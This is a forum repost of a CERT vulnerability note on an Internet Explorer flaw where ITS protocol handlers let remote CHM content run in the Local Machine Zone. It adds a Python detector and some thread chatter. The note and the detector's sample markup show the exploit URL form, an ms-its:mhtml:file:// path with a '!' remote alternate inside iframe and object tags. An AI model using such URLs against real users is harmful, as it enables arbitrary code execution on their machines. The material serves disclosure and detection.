Posted on 04/08/2004 12:56:30 PM PDT by Salo
Vulnerability Note VU#323070
Microsoft Internet Explorer does not properly validate source of CHM components referenced by ITS protocol handlers
Overview
Microsoft Internet Explorer (IE) does not adequately validate the source of script contained in compiled help (CHM) file components that are referenced by the Microsoft InfoTech Storage (ITS) protocol handlers. An attacker could exploit this vulnerability to execute script in different security domains. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE.
I. Description
The Cross Domain Security Model
IE uses a cross-domain security model to maintain separation between browser frames from different sources. This model is designed to prevent code in one domain from accessing data in a different domain. The Local Machine Zone is "...an implicit zone for content that exists on the local computer. The content found on the user's computer, except for content that Internet Explorer caches on the local system, is treated with a high level of trust."
HTML Help
The Microsoft HTML Help system "...is the standard help system for the Windows platform." HTML Help components can be compiled to "...compress HTML, graphic, and other files into a relatively small compiled help (.chm) file...". The resulting compiled Help (CHM) file can then "...be distributed with a software application, or downloaded from the Web." The Help Viewer application "...uses the underlying components of Microsoft Internet Explorer to display help content. It supports HTML, ActiveX, Java, scripting languages (JScript, and Microsoft Visual Basic Scripting Edition)...".
The InfoTech Storage Format
CHM files use the Microsoft InfoTech Storage format (ITS). IE can access components within CHM files (via the IStorage interface) using several protocol handlers: ms-its, ms-itss, its, mk:@MSITStore.
For example, the following URL references an HTML file within a CHM file hosted on a remote web site:
ms-its:http://www.example.com/directory/path/compiledhelpfile.chm:/htmlfile.html
This URL references a local CHM file:
ms-its:file://c:\directory\path\compiledhelpfile.chm:/htmlfile.html
MIME Encapsulation of Aggregate HTML Documents (MHTML)
MHTML (RFC 2110) provides a way to include multiple components of an HTML document (HTML, images, script, etc.) in a single MIME email message. The ITS protocol handlers can also reference objects contained within MHTML documents:
ms-its:mhtml:file://c:\directory\path\mhtmlfile.mhtml
The ITS protocol handlers can also specify an alternate location for MHTML content, introduced by "!":
ms-its:mhtml:file://c:\file_does_not_exist.mhtml!http://www.example.com/directory/path/compiledhelpfile.chm:/htmlfile.html
The Problem
If an ITS protocol handler is unable to access the specified MHTML file, the handler will attempt to access the content specified by the alternate location. It then evaluates what it fetched from the alternate location as if it had come from the primary location: HTML content from one domain (htmlfile.html on example.com) is treated as if it were in a different domain (file://, the Local Machine Zone). This is a violation of the cross-domain security model. Limited testing shows that the ms-its, its, and mk:@MSITStore protocol handlers are vulnerable.
An attacker could exploit this vulnerability using a crafted HTML document containing script or an ActiveX object or possibly an IFRAME element. Due to the way IE determines the MIME type of a file referenced by a URL, an HTML document may not necessarily have the expected file name extension (.html or .htm). Likewise, a CHM file may not have the expected .chm extension.
Functional exploit code is publicly available, and there are reports of systems being compromised via this vulnerability (Ibiza trojan).
Any program that uses the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Outlook and Outlook Express are affected.
II. Impact
By convincing a victim to view an HTML document (web page, HTML email), an attacker could execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE. The attacker could also read or modify data in other web sites (read cookies/content, modify/create content, etc.).
III. Solution
There is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below.
Note: Disabling Active scripting or ActiveX controls is not an effective workaround
Disabling Active scripting and ActiveX controls in any zone does not prevent the exploitation of this vulnerability. Disabling these features in the Internet and Local Machine Zones may stop some attacks.
Disable ITS protocol handlers
Disabling the ITS protocol handlers may prevent exploitation of this vulnerability. Rename the following registry keys (renaming rather than deleting them keeps the change easy to reverse):
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-its
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\its
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\mk
Modifying the Windows registry in this way may have unintended consequences. On Windows XP and ME, disabling the ITS protocol handlers will reduce the functionality of the Help and Support Center (HSC).
Do not follow unsolicited links
Do not click on unsolicited URLs received in email, instant messages, web forums, or internet relay chat (IRC) channels.
Maintain updated anti-virus software
Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. US-CERT maintains a partial list of antivirus vendors.
Use a different web browser
There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). It is possible for a different browser on a Windows system to invoke IE to handle ITS protocol URLs.
Systems Affected
Vendor                  Status      Date Updated
Microsoft Corporation   Vulnerable  5-Apr-2004
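The URL forms in the Description and the fallback behaviour described under "The Problem" can be turned into a detection check for mail gateways, proxies or log review. The Python below is an added example written for this page; it is not part of the CERT note and is not Microsoft code. It parses the ms-its / ms-itss / its / mk:@MSITStore URL forms shown above, separates the primary MHTML location from the "!" alternate, classifies each location by zone (only the file:// versus remote distinction the note relies on is modelled; the real IE zone logic is not reproduced), and flags a file:// primary whose alternate is remote. It deliberately ignores file extensions, because the note says neither the CHM nor the HTML component need carry the expected extension. The sample markup is constructed, and the host names are from the reserved example domains.

```python
import re

# ITS protocol handler prefixes named in the vulnerability note. The prefix
# alone is harmless; the mhtml:<primary>!<alternate> form is what matters.
ITS_PREFIXES = ("ms-its:", "ms-itss:", "its:", "mk:@msitstore:")

# ":/" (or "::/" in the mk:@MSITStore form) separates the storage file from
# the component inside it. "://" belongs to the inner URL and must not be
# split on, and a drive letter such as "c:/" is not a component separator.
_COMPONENT_SEP = re.compile(r"(?<![^A-Za-z0-9][A-Za-z])::?/(?!/)")

# Candidate ITS URLs inside HTML or mail bodies (delimited by quotes,
# whitespace or angle brackets). Assumption: URLs are not HTML-entity encoded.
_ITS_URL_IN_MARKUP = re.compile(r"(?i)(?<![\w.-])(?:ms-itss?|its|mk:@msitstore):[^\s\"'<>]+")


def zone_of(location):
    """Approximate IE zone of a storage location. Only the distinction the
    note relies on is modelled: file://, UNC or drive-letter paths are the
    Local Machine Zone; http/https/ftp is the Internet Zone."""
    loc = location.strip().lower()
    if loc.startswith(("file:", "\\\\")) or re.match(r"^[a-z]:[\\/]", loc):
        return "LocalMachine"
    if loc.startswith(("http:", "https:", "ftp:")):
        return "Internet"
    return "Unknown"


def split_storage(spec):
    """Split 'storage:/component' into (storage, component or None). The last
    separator wins so that separators inside the inner URL are ignored."""
    matches = list(_COMPONENT_SEP.finditer(spec))
    if not matches:
        return spec, None
    last = matches[-1]
    return spec[:last.start()], spec[last.end():]


def parse_its_url(url):
    """Describe an ITS URL: handler, primary storage, optional alternate
    storage (after '!'), the zones of both, and the component requested.
    Returns None for non-ITS URLs."""
    low = url.lower()
    prefix = next((p for p in ITS_PREFIXES if low.startswith(p)), None)
    if prefix is None:
        return None
    rest = url[len(prefix):]
    primary_spec, alternate_spec = rest, None
    if rest.lower().startswith("mhtml:"):
        # "!" introduces the alternate location the handler reads when the
        # primary MHTML file cannot be opened.
        primary_spec, _, alternate_spec = rest[len("mhtml:"):].partition("!")
    primary, component = split_storage(primary_spec)
    info = {
        "handler": prefix.rstrip(":"),
        "primary": primary,
        "primary_zone": zone_of(primary),
        "alternate": None,
        "alternate_zone": None,
        "component": component,
    }
    if alternate_spec:
        alternate, alt_component = split_storage(alternate_spec)
        info["alternate"] = alternate
        info["alternate_zone"] = zone_of(alternate)
        info["component"] = alt_component or component
    return info


def is_zone_confusion(info):
    """The VU#323070 pattern: a Local Machine Zone primary whose alternate is
    not local, so remote content would be evaluated as file:// content.
    Extensions are ignored on purpose; the note says they are not reliable."""
    return bool(info and info["alternate"]
                and info["primary_zone"] == "LocalMachine"
                and info["alternate_zone"] != "LocalMachine")


def scan_markup(text):
    """Return every ITS URL in a page or mail body that shows the pattern."""
    return [m.group(0) for m in _ITS_URL_IN_MARKUP.finditer(text)
            if is_zone_confusion(parse_its_url(m.group(0)))]


# Constructed sample markup (not a real exploit page): lines 2 and 3 show the
# pattern, line 1 is an ordinary remote CHM, line 4 an ordinary local MHTML.
SAMPLE_MARKUP = """
<a href="ms-its:http://www.example.com/help/compiledhelpfile.chm:/htmlfile.html">remote help</a>
<iframe src="ms-its:mhtml:file://c:\\nosuch.mhtml!http://www.example.com/help/payload.gif:/page.htm"></iframe>
<object data="mk:@MSITStore:mhtml:file://C:\\missing.mhtml!http://www.example.net/x.bin::/run.htm"></object>
<a href="ms-its:mhtml:file://c:\\docs\\manual.mhtml">local manual</a>
"""

if __name__ == "__main__":
    for url in scan_markup(SAMPLE_MARKUP):
        info = parse_its_url(url)
        print(f"{info['handler']}: {info['primary_zone']} primary -> "
              f"{info['alternate_zone']} alternate ({info['alternate']})")
```

Run as a script it reports the two flagged URLs from the sample. The check keys on the zone mismatch rather than on ".chm" or ".htm", and it treats any non-local alternate (including one whose scheme it cannot classify) as suspect, since a fallback that is not local is exactly what the handler should never promote to the Local Machine Zone.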
Carolyn
Wanna be Penguified? Just holla!
Got root?
Use a different web browser
In its defense, MSIE does seem easier for the Pre-K and Kindergarten set to use than some of the other browsers are.
Use a different web browser
Don't you mean use a different OS??
Linux, OS X, Beos, DOS, Commodore 64??
Carolyn
Linux, OS X, Beos, DOS, Commodore 64??
Well, yeah. I figure I beat that drum often enough though that I could give it a rest. :-)
I might be soon though. I am very excited about Thunderbird; it just needs an integrated calendar and ActiveSync compatibility. (Though my larger clients will still run Exchange/Outlook.)